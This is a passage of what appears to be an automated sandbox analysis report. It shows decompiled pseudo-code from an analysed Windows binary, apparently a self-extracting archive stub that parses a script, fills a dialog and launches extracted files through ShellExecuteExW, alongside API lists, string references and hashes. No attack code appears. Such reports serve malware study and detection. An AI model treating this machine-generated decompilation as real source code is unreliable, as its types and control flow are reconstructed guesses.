										L42:
										_t343 = 0x3a;
										__eflags =  *(_t228 + _t383 * 2) - _t343;
										if( *(_t228 + _t383 * 2) != _t343) {
											L71:
											_t390[0x18] = _t228 + _t383 * 2;
											_t244 = E0019F91A( *(_t228 + _t383 * 2) & 0x0000ffff);
											__eflags = _t244;
											if(_t244 == 0) {
												L79:
												_t336 = _t390[0x1e];
												_t228 = _t390[0x1a];
												goto L80;
											}
											E0019FAB1(_t390 - 0x264, _t390[0x18], 0x64);
											_t248 = E001B4E1D(_t390 - 0x264, L" \t,");
											_t390[0x18] = _t248;
											__eflags = _t248;
											if(_t248 == 0) {
												goto L79;
											}
											 *_t248 = 0;
											E001A11FA(_t390 - 0x264, _t390 - 0x138, 0x64);
											E0019FA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
											E0019FA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
											E0019FA56(_t390, _t390 - 0x70, 0x32);
											_t262 = E001B4E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0019CCED);
											_t394 = _t394 + 0x14;
											__eflags = _t262;
											if(_t262 != 0) {
												_t268 =  *_t262 * 0xc;
												__eflags = _t268;
												_t167 = _t268 + 0x1cd150; // 0x28b64ee0
												_t390[0x17] =  *_t167;
											}
											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
											__eflags = _t383;
											_t267 = _t390[0x1a];
											_t374 = 0x20;
											while(1) {
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												L77:
												_t174 =  &(_t390[0x15]); // 0x9
												__eflags = _t348 -  *_t174;
												if(_t348 !=  *_t174) {
													L51:
													_t336 = _t390[0x1e];
													goto L52;
												}
												L78:
												_t383 = _t383 + 1;
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												goto L77;
											}
										}
										_t389 = _t390[0x1a];
										_t270 = _t228 | 0xffffffff;
										__eflags = _t270;
										_t390[0x16] = _t270;
										_t390[0xd] = L"STRINGS";
										_t390[0xe] = L"DIALOG";
										_t390[0xf] = L"MENU";
										_t390[0x10] = L"DIRECTION";
										_t390[0x18] = _t316;
										do {
											_t390[0x18] = E001B2B33( *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)));
											_t272 = E001B4DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)), _t271);
											_t394 = _t394 + 0x10;
											_t375 = 0x20;
											__eflags = _t272;
											if(_t272 != 0) {
												L47:
												_t273 = _t390[0x16];
												goto L48;
											}
											_t357 = _t390[0x18] + _t383;
											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
												goto L47;
											}
											_t273 = _t316;
											_t383 = _t357 + 1;
											_t390[0x16] = _t273;
											L48:
											_t316 = _t316 + 1;
											__eflags = _t316 - 4;
										} while (_t316 < 4);
										_t387 = _t390[0x12];
										_t316 = 0;
										__eflags = _t273;
										if(__eflags != 0) {
											_t228 = _t390[0x1a];
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												L60:
												_t132 =  &(_t390[0x15]); // 0x9
												__eflags = _t351 -  *_t132;
												if(_t351 !=  *_t132) {
													_t376 = _t228 + _t383 * 2;
													_t390[0x18] = _t316;
													_t274 = 0x20;
													_t352 = _t316;
													__eflags =  *_t376 - _t274;
													if( *_t376 <= _t274) {
														L66:
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
														E001A11FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
														_t383 = _t383 + _t390[0x18];
														_t279 = _t390[0x16];
														__eflags = _t279 - 3;
														if(_t279 != 3) {
															__eflags = _t279 - 1;
															_t280 = "$%s:";
															if(_t279 != 1) {
																_t280 = "@%s:";
															}
															E0019D9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
															_t394 = _t394 + 0x10;
														} else {
															_t284 = E001B2B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t352 - 0x63;
														if(_t352 >= 0x63) {
															break;
														}
														_t287 =  *_t376;
														_t376 = _t376 + 2;
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
														_t352 = _t352 + 1;
														_t288 = 0x20;
														__eflags =  *_t376 - _t288;
														if( *_t376 > _t288) {
															continue;
														}
														break;
													}
													_t390[0x18] = _t352;
													goto L66;
												}
												L61:
												_t383 = _t383 + 1;
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												goto L60;
											}
										}
										E0019FA56(_t390 - 0xd4, 0x1c2624, 0x64);
										goto L51;
									}
									__eflags = _t373 - _t390[0x13];
									if(_t373 != _t390[0x13]) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t383 - _t390[0x19];
								} while (_t383 < _t390[0x19]);
								_t218 = _t390[0x1b];
								_t371 = _t390[0x17];
								goto L54;
							} else {
								L001B2B4E(_t382);
								goto L57;
							}
						}
						_t333 = _t328 >> 1;
						_t390[0x19] = _t333;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E001A3393(_t387, _t370, _t380);
						E001A3393(_t387 + 0x14, _t370, _t380);
						_t380 = _t380 + 1;
						_t399 = _t380 -  *0x1cd5f4; // 0x63
					} while (_t399 < 0);
					_t316 = 0;
					goto L7;
				}
			}

0x0019cfd0
0x0019cfd0
0x0019cfd1
0x0019cfd9
0x0019cfe3
0x0019cfed
0x0019cfee
0x0019cfef
0x0019cff2
0x0019cff4
0x0019cff7
0x0019cffa
0x0019d000
0x0019d002
0x0019d005
0x0019d00b
0x0019d047
0x0019d00d
0x0019d015
0x0019d02d
0x0019d037
0x0019d037
0x0019d052
0x0019d057
0x0019d05f
0x0019d062
0x0019d070
0x0019d42d
0x0019d433
0x0019d43e
0x0019d449
0x0019d076
0x0019d076
0x0019d078
0x0019d07e
0x0019d09c
0x0019d0a8
0x0019d0ba
0x0019d0bf
0x0019d0c2
0x0019d0c5
0x0019d0c8
0x0019d0cb
0x0019d0ce
0x0019d0e2
0x0019d0f7
0x0019d0fc
0x0019d0ff
0x0019d101
0x0019d101
0x0019d104
0x0019d109
0x0019d1c8
0x0019d1c8
0x0019d1cb
0x0019d1ce
0x0019d1df
0x0019d1e7
0x0019d1e8
0x0019d1eb
0x0019d1f0
0x00000000
0x00000000
0x0019d1f6
0x0019d1f9
0x00000000
0x00000000
0x00000000
0x0019d1f9
0x00000000
0x0019d10f
0x0019d117
0x0019d142
0x0019d144
0x0019d14d
0x0019d178
0x0019d180
0x0019d1ac
0x0019d1ac
0x0019d1b0
0x00000000
0x00000000
0x0019d1b2
0x00000000
0x0019d18c
0x0019d19c
0x0019d1a1
0x0019d1a6
0x00000000
0x00000000
0x00000000
0x0019d1a6
0x0019d180
0x0019d155
0x0019d15b
0x0019d16c
0x0019d171
0x0019d176
0x0019d1ba
0x00000000
0x0019d1ba
0x0019d176
0x00000000
0x0019d123
0x0019d133
0x0019d138
0x0019d13d
0x0019d1be
0x0019d1be
0x0019d1c1
0x0019d1c3
0x00000000
0x0019d1c3
0x0019d13f
0x00000000
0x0019d13f
0x0019d117
0x0019d10f
0x0019d208
0x0019d20b
0x0019d210
0x0019d21a
0x0019d21c
0x0019d220
0x0019d222
0x00000000
0x00000000
0x0019d239
0x0019d23e
0x0019d241
0x0019d243
0x0019d253
0x0019d254
0x0019d259
0x0019d25d
0x0019d25f
0x00000000
0x00000000
0x0019d265
0x0019d268
0x0019d26b
0x0019d26f
0x0019d275
0x0019d27a
0x0019d27e
0x0019d281
0x0019d284
0x0019d284
0x0019d289
0x0019d28b
0x0019d28d
0x0019d28d
0x0019d293
0x0019d2a3
0x0019d2a8
0x0019d2ad
0x0019d2b2
0x0019d2b6
0x0019d2b8
0x0019d2c6
0x0019d2ca
0x0019d2cc
0x0019d2ce
0x0019d2d1
0x0019d2d4
0x0019d2d6
0x0019d2d9
0x0019d3c1
0x0019d3ca
0x0019d3d2
0x0019d3da
0x0019d3e1
0x0019d3e4
0x0019d3fe
0x0019d40b
0x0019d413
0x0019d425
0x00000000
0x00000000
0x00000000
0x00000000
0x0019d3e6
0x0019d3e6
0x0019d3ea
0x0019d3f3
0x0019d3f8
0x0019d3f9
0x0019d3f9
0x00000000
0x0019d3e6
0x0019d2df
0x0019d2e6
0x0019d2ed
0x0019d2f4
0x0019d2f4
0x0019d2f7
0x0019d2f9
0x0019d5f5
0x0019d5f5
0x0019d5f9
0x0019d5fa
0x0019d5fd
0x00000000
0x00000000
0x0019d603
0x0019d607
0x0019d659
0x0019d65a
0x0019d65d
0x0019d683
0x0019d690
0x0019d695
0x0019d698
0x0019d69a
0x0019d67b
0x0019d67b
0x00000000
0x0019d67b
0x0019d661
0x0019d662
0x0019d665
0x00000000
0x00000000
0x0019d667
0x0019d667
0x0019d66d
0x00000000
0x00000000
0x0019d676
0x0019d67a
0x0019d67a
0x00000000
0x0019d67a
0x0019d609
0x0019d60f
0x00000000
0x00000000
0x0019d619
0x0019d619
0x0019d61c
0x0019d643
0x0019d645
0x0019d648
0x0019d649
0x0019d64d
0x0019d64e
0x0019d651
0x00000000
0x0019d651
0x0019d61e
0x0019d61e
0x0019d621
0x0019d63f
0x00000000
0x0019d63f
0x0019d623
0x0019d623
0x0019d626
0x0019d63b
0x00000000
0x0019d63b
0x0019d628
0x0019d628
0x0019d62b
0x0019d637
0x00000000
0x0019d637
0x0019d62e
0x0019d631
0x00000000
0x00000000
0x0019d633
0x00000000
0x0019d633
0x0019d2ff
0x0019d304
0x0019d308
0x0019d314
0x0019d316
0x0019d317
0x0019d31b
0x0019d508
0x0019d50b
0x0019d512
0x0019d517
0x0019d519
0x0019d5ef
0x0019d5ef
0x0019d5f2
0x00000000
0x0019d5f2
0x0019d52b
0x0019d53c
0x0019d541
0x0019d546
0x0019d548
0x00000000
0x00000000
0x0019d550
0x0019d563
0x0019d575
0x0019d587
0x0019d596
0x0019d5ab
0x0019d5b0
0x0019d5b3
0x0019d5b5
0x0019d5b7
0x0019d5b7
0x0019d5ba
0x0019d5c0
0x0019d5c0
0x0019d5d3
0x0019d5d3
0x0019d5d5
0x0019d5d8
0x0019d5d9
0x0019d5d9
0x0019d5dd
0x0019d5e0
0x00000000
0x00000000
0x0019d5e2
0x0019d5e2
0x0019d5e2
0x0019d5e6
0x0019d3af
0x0019d3af
0x00000000
0x0019d3af
0x0019d5ec
0x0019d5ec
0x0019d5d9
0x0019d5dd
0x0019d5e0
0x00000000
0x00000000
0x00000000
0x0019d5e0
0x0019d5d9
0x0019d321
0x0019d324
0x0019d324
0x0019d327
0x0019d32a
0x0019d331
0x0019d338
0x0019d33f
0x0019d346
0x0019d349
0x0019d35a
0x0019d361
0x0019d366
0x0019d36b
0x0019d36c
0x0019d36e
0x0019d386
0x0019d386
0x00000000
0x0019d386
0x0019d373
0x0019d375
0x0019d37a
0x00000000
0x00000000
0x0019d37c
0x0019d37e
0x0019d381
0x0019d389
0x0019d389
0x0019d38a
0x0019d38a
0x0019d38f
0x0019d392
0x0019d394
0x0019d396
0x0019d44c
0x0019d44f
0x00000000
0x00000000
0x00000000
0x00000000
0x0019d455
0x0019d455
0x0019d455
0x0019d459
0x0019d45c
0x00000000
0x00000000
0x0019d45e
0x0019d45e
0x0019d45e
0x0019d462
0x0019d467
0x0019d46a
0x0019d46f
0x0019d470
0x0019d472
0x0019d475
0x0019d496
0x0019d498
0x0019d4ad
0x0019d4b2
0x0019d4b5
0x0019d4b8
0x0019d4bb
0x0019d4de
0x0019d4e1
0x0019d4e6
0x0019d4e8
0x0019d4e8
0x0019d4fb
0x0019d500
0x0019d4bd
0x0019d4c9
0x0019d4d1
0x0019d4d6
0x0019d4d6
0x00000000
0x00000000
0x00000000
0x00000000
0x0019d477
0x0019d477
0x0019d477
0x0019d47a
0x00000000
0x00000000
0x0019d47c
0x0019d47f
0x0019d482
0x0019d48a
0x0019d48d
0x0019d48e
0x0019d491
0x00000000
0x00000000
0x00000000
0x0019d491
0x0019d493
0x00000000
0x0019d493
0x0019d464
0x0019d464
0x0019d455
0x0019d455
0x0019d459
0x0019d45c
0x00000000
0x00000000
0x00000000
0x0019d45c
0x0019d455
0x0019d3aa
0x00000000
0x0019d3aa
0x0019d30a
0x0019d30e
0x00000000
0x00000000
0x00000000
0x0019d3b2
0x0019d3b2
0x0019d3b2
0x0019d3bb
0x0019d3be
0x00000000
0x0019d2ba
0x0019d2bb
0x00000000
0x0019d2c0
0x0019d2b8
0x0019d245
0x0019d247
0x00000000
0x00000000
0x00000000
0x00000000
0x0019d080
0x0019d080
0x0019d083
0x0019d08c
0x0019d091
0x0019d092
0x0019d092
0x0019d09a
0x00000000
0x0019d09a

APIs

__EH_prolog.LIBCMT ref: 0019CFD9
_wcschr.LIBVCRUNTIME ref: 0019CFFA
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0019D015
__fprintf_l.LIBCMT ref: 0019D4FB

Part of subcall function 001A0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0019B312,00000000,?,?,?,0019004A), ref: 001A0FFA

Strings

, xrefs: 0019D5E2, 0019D45E
,, xrefs: 0019D536
RTL, xrefs: 0019D4C3
a, xrefs: 0019D182
*messages***, xrefs: 0019D12D
@%s:, xrefs: 0019D4E8, 0019D4F1
$%s:, xrefs: 0019D4E1
*messages***, xrefs: 0019D166
R, xrefs: 0019D178

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-4124877899
Opcode ID: 6ccc42262a0324fa4820e0620aa60d9aaf9475260b28857c08834e36b094faa0
Instruction ID: 519220876122de840959d97db729ae614ddf64d50551602ac12c7ff7dfddde06
Opcode Fuzzy Hash: 6ccc42262a0324fa4820e0620aa60d9aaf9475260b28857c08834e36b094faa0
Instruction Fuzzy Hash: AC12CFB1A00309ABDF24EFA4EC45BED37A9FF24704F50016AF90997291EB70D985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001AC190, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001AC190(intOrPtr _a4, long _a8) {
				char _v67;
				intOrPtr _v72;
				signed int _v84;
				int _v88;
				void* _v92;
				intOrPtr _t40;
				intOrPtr _t43;
				struct HWND__* _t45;
				char _t48;

				E001AA388(); // executed
				_t45 = GetDlgItem( *0x1d75c8, 0x68);
				_t48 =  *0x1d75d6; // 0x1
				if(_t48 == 0) {
					_t43 =  *0x1d75e8; // 0x0
					E001A8569(_t43);
					ShowWindow(_t45, 5); // executed
					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
					SendMessageW(_t45, 0xc2, 0, 0x1c22e4);
					 *0x1d75d6 = 1;
				}
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				_v92 = 0x5c;
				SendMessageW(_t45, 0x43a, 0,  &_v92);
				_v67 = 0;
				_t40 = _a4;
				_v88 = 1;
				if(_t40 != 0) {
					_v72 = 0xa0;
					_v88 = 0x40000001;
					_v84 = _v84 & 0xbfffffff | 1;
				}
				SendMessageW(_t45, 0x444, 1,  &_v92);
				SendMessageW(_t45, 0xc2, 0, _a8);
				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t40 != 0) {
					_v84 = _v84 & 0xfffffffe | 0x40000000;
					SendMessageW(_t45, 0x444, 1,  &_v92);
				}
				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
			}

0x001ac197
0x001ac1b2
0x001ac1b9
0x001ac1bf
0x001ac1c1
0x001ac1c7
0x001ac1cf
0x001ac1de
0x001ac1e8
0x001ac1ea
0x001ac1ea
0x001ac1fe
0x001ac204
0x001ac214
0x001ac218
0x001ac21c
0x001ac221
0x001ac227
0x001ac232
0x001ac23c
0x001ac244
0x001ac244
0x001ac254
0x001ac25e
0x001ac26d
0x001ac271
0x001ac27f
0x001ac290
0x001ac290
0x001ac2a4

APIs

Part of subcall function 001AA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001AA399
Part of subcall function 001AA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001AA3AA
Part of subcall function 001AA388: IsDialogMessageW.USER32(0019004A,?), ref: 001AA3BE
Part of subcall function 001AA388: TranslateMessage.USER32(?), ref: 001AA3CC
Part of subcall function 001AA388: DispatchMessageW.USER32(?), ref: 001AA3D6

GetDlgItem.USER32(00000068,001EDE38), ref: 001AC1A4
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,001A9D8F), ref: 001AC1CF
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001AC1DE
SendMessageW.USER32(00000000,000000C2,00000000,001C22E4), ref: 001AC1E8
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001AC1FE
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001AC214
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001AC254
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001AC25E
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001AC26D
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001AC290
SendMessageW.USER32(00000000,000000C2,00000000,001C304C), ref: 001AC29B

Strings

\, xrefs: 001AC204

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: d1b7296f3001f96af391f9da297f5294dbbc7e10b2467228c95c601a138f5d97
Instruction ID: 98161ec30ebef278d46b98e0ee4c33511a122f57caa01873d8c6cc5b03c0d193
Opcode Fuzzy Hash: d1b7296f3001f96af391f9da297f5294dbbc7e10b2467228c95c601a138f5d97
Instruction Fuzzy Hash: 9521437124A3047BE311FB24AC41FAF7F9CEF92754F000619FA90A61D1D7A59A098BB7

Uniqueness

Uniqueness Score: -1.00%

Function 001AC431, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E001AC431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				signed int _t80;
				signed short* _t81;
				signed short _t82;
				intOrPtr _t84;
				long _t86;
				signed short* _t87;
				struct HWND__* _t89;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t99;

				_t54 = 0x1040;
				E001AD940();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E001B2B33(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E001AE920(_t86,  &_a4, 0, _t86);
					_t84 = _a4172;
					_t99 = _t99 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t84 != 0) {
						_a8 = 0x5c0;
					}
					_t80 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_t95 = 0x22;
					if(_t80 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t80 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t84 == 0 &&  *0x1da602 != _t77) {
								_a24 = 0x1da602;
							}
						}
						_a32 = 1;
						_t93 = E0019B153(_t87);
						if(_t93 != 0 && E001A1410(_t93, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00199E6B(_a20) != 0) {
							_push(0x800);
							_push( &_a64);
							_push(_a20);
							E0019AED7();
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t89 = _a4160;
							if( *0x1d85f8 != _t77 || _a4168 != _t77 ||  *0x1ede21 != _t77) {
								if(_t89 != 0) {
									_push(_t89);
									if( *0x1cdf24() != 0) {
										ShowWindow(_t89, _t77);
										_t77 = 1;
									}
								}
								 *0x1cdf20(_a56, 0x7d0);
								E001AC8F0(_a48);
								if( *0x1ede21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0x1ede24) {
										 *0x1ede24 = _t68;
									}
									 *0x1ede22 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t93 == 0 || E001A1410(_t93, L".exe") != 0) {
								_t54 = _a4160;
								if( *0x1d85f8 != 0 && _t54 == 0 &&  *0x1ede21 == _t54) {
									 *0x1ede28 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t89, 1);
							}
						}
						goto L55;
					}
					_t81 = _t91;
					_v0 = 0x20;
					do {
						if( *_t81 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t82 = _v0;
									_t91[_t57] = _t82;
									L10:
									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t82 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t81 =  &(_t91[_t57]);
					} while ( *_t81 != _t77);
					goto L13;
				}
			}

0x001ac431
0x001ac436
0x001ac43d
0x001ac444
0x001ac449
0x001ac695
0x001ac69d
0x001ac69d
0x001ac450
0x001ac45b
0x00000000
0x001ac461
0x001ac464
0x001ac46c
0x001ac471
0x001ac478
0x001ac47b
0x001ac47f
0x001ac489
0x001ac48b
0x001ac48b
0x001ac493
0x001ac496
0x001ac49c
0x001ac4a0
0x001ac4a2
0x001ac4a2
0x001ac4a4
0x001ac4a8
0x001ac4ad
0x001ac4e5
0x001ac4e5
0x001ac4e9
0x001ac4eb
0x001ac4f4
0x001ac4ff
0x001ac4ff
0x001ac4f4
0x001ac508
0x001ac515
0x001ac519
0x001ac52a
0x001ac52a
0x001ac53d
0x001ac53f
0x001ac548
0x001ac549
0x001ac54d
0x001ac556
0x001ac556
0x001ac55f
0x001ac567
0x001ac56d
0x001ac580
0x001ac595
0x001ac597
0x001ac5a0
0x001ac5a4
0x001ac5a6
0x001ac5a6
0x001ac5a0
0x001ac5b1
0x001ac5bb
0x001ac5c7
0x001ac5e6
0x001ac5f0
0x001ac5f2
0x001ac5f2
0x001ac5f7
0x001ac5f7
0x001ac5c7
0x001ac602
0x001ac60a
0x001ac622
0x001ac629
0x001ac637
0x001ac637
0x001ac67f
0x001ac67f
0x001ac67f
0x001ac688
0x001ac691
0x001ac691
0x001ac688
0x00000000
0x001ac694
0x001ac4af
0x001ac4b1
0x001ac4b9
0x001ac4bc
0x001ac649
0x001ac649
0x001ac64e
0x00000000
0x00000000
0x001ac647
0x001ac655
0x001ac659
0x001ac4c6
0x001ac4ca
0x001ac66a
0x001ac66e
0x001ac66e
0x001ac673
0x001ac676
0x00000000
0x00000000
0x00000000
0x00000000
0x001ac4ca
0x001ac647
0x001ac650
0x001ac4c2
0x00000000
0x001ac4dc
0x001ac4dc
0x001ac4dd
0x001ac4e0
0x00000000
0x001ac4b9

APIs

ShellExecuteExW.SHELL32(000001C0), ref: 001AC55F
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 001AC5A4
GetExitCodeProcess.KERNEL32 ref: 001AC5DC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001AC602
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 001AC691

Part of subcall function 001A1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0019ACFE,?,?,?,0019ACAD,?,-00000002,?,00000000,?), ref: 001A1426

Strings

.inf, xrefs: 001AC51B
.exe, xrefs: 001AC60C
, xrefs: 001AC4B1

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 2e5708a0c44adea39b145f5c234ce25f04e104bb84500247a092fc54fc10d00c
Instruction ID: 11f27376471ace537de771e3f26994db896b2decc35cefdb6c2efd89170a0a08
Opcode Fuzzy Hash: 2e5708a0c44adea39b145f5c234ce25f04e104bb84500247a092fc54fc10d00c
Instruction Fuzzy Hash: A75135785083809BDB31DF64E954ABBB7E8AF9A704F04081DF4C597250D7B1D984C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 001B95A5, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E001B95A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t69;
				int _t77;
				short* _t80;
				signed int _t86;
				signed int _t89;
				void* _t94;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				int _t104;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x1cd668; // 0x44aa1787
				_v8 = _t49 ^ _t105;
				_push(__esi);
				_t102 = _a20;
				if(_t102 > 0) {
					_t77 = E001BDBBC(_a16, _t102);
					_t109 = _t77 - _t102;
					_t4 = _t77 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t77;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E001AE203(_t54, _v8 ^ _t105);
				} else {
					_t94 = _t54 + _t54;
					_t84 = _t94 + 8;
					asm("sbb eax, eax");
					if((_t94 + 0x00000008 & _t54) == 0) {
						_t80 = 0;
						__eflags = 0;
						L14:
						if(_t80 == 0) {
							L36:
							_t104 = 0;
							L37:
							E001B980D(_t80);
							_t54 = _t104;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
						_t120 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t59 = E001B9C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
						_t104 = _t59;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t86 = _t95 + 8;
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							__eflags = _t86 & _t59;
							if((_t86 & _t59) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
